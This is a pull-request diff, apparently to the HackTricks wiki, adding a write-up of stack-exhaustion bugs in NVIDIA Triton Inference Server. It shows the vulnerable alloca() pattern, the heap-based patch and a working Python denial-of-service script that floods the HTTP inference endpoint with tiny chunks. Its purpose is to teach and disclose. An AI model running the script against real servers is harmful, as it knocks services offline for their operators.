Skip to content
Merged
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
64 changes: 64 additions & 0 deletions src/binary-exploitation/stack-overflow/README.md
Original file line number Diff line number Diff line change
Expand Up @@ -131,8 +131,72 @@ Even though stack canaries abort the process, an attacker still gains a **Denial
* Always provide a **maximum field width** (e.g. `%511s`).
* Prefer safer alternatives such as `snprintf`/`strncpy_s`.

### Real-World Example: CVE-2025-23310 & CVE-2025-23311 (NVIDIA Triton Inference Server)

NVIDIA’s Triton Inference Server (≀ v25.06) contained multiple **stack-based overflows** reachable through its HTTP API.
The vulnerable pattern repeatedly appeared in `http_server.cc` and `sagemaker_server.cc`:

```c
int n = evbuffer_peek(req->buffer_in, -1, NULL, NULL, 0);
if (n > 0) {
/* allocates 16 * n bytes on the stack */
struct evbuffer_iovec *v = (struct evbuffer_iovec *)
alloca(sizeof(struct evbuffer_iovec) * n);
...
}
```

1. `evbuffer_peek` (libevent) returns the **number of internal buffer segments** that compose the current HTTP request body.
2. Each segment causes a **16-byte** `evbuffer_iovec` to be allocated on the **stack** via `alloca()` – **without any upper bound**.
3. By abusing **HTTP _chunked transfer-encoding_**, a client can force the request to be split into **hundreds-of-thousands of 6-byte chunks** (`"1\r\nA\r\n"`). This makes `n` grow unbounded until the stack is exhausted.

#### Proof-of-Concept (DoS)
```python
#!/usr/bin/env python3
import socket, sys

def exploit(host="localhost", port=8000, chunks=523_800):
s = socket.create_connection((host, port))
s.sendall((
f"POST /v2/models/add_sub/infer HTTP/1.1\r\n"
f"Host: {host}:{port}\r\n"
"Content-Type: application/octet-stream\r\n"
"Inference-Header-Content-Length: 0\r\n"
"Transfer-Encoding: chunked\r\n"
"Connection: close\r\n\r\n"
).encode())

for _ in range(chunks): # 6-byte chunk ➜ 16-byte alloc
s.send(b"1\r\nA\r\n") # amplification factor β‰ˆ 2.6x
s.sendall(b"0\r\n\r\n") # end of chunks
s.close()

if __name__ == "__main__":
exploit(*sys.argv[1:])
```
A ~3 MB request is enough to overwrite the saved return address and **crash** the daemon on a default build.

#### Patch & Mitigation
The 25.07 release replaces the unsafe stack allocation with a **heap-backed `std::vector`** and gracefully handles `std::bad_alloc`:

```c++
std::vector<evbuffer_iovec> v_vec;
try {
v_vec = std::vector<evbuffer_iovec>(n);
} catch (const std::bad_alloc &e) {
return TRITONSERVER_ErrorNew(TRITONSERVER_ERROR_INVALID_ARG, "alloc failed");
}
struct evbuffer_iovec *v = v_vec.data();
```

Lessons learned:
* Never call `alloca()` with attacker-controlled sizes.
* Chunked requests can drastically change the shape of server-side buffers.
* Validate / cap any value derived from client input *before* using it in memory allocations.

## References
* [watchTowr Labs – Stack Overflows, Heap Overflows and Existential Dread (SonicWall SMA100)](https://labs.watchtowr.com/stack-overflows-heap-overflows-and-existential-dread-sonicwall-sma100-cve-2025-40596-cve-2025-40597-and-cve-2025-40598/)
* [Trail of Bits – Uncovering memory corruption in NVIDIA Triton](https://blog.trailofbits.com/2025/08/04/uncovering-memory-corruption-in-nvidia-triton-as-a-new-hire/)

{{#include ../../banners/hacktricks-training.md}}

Expand Down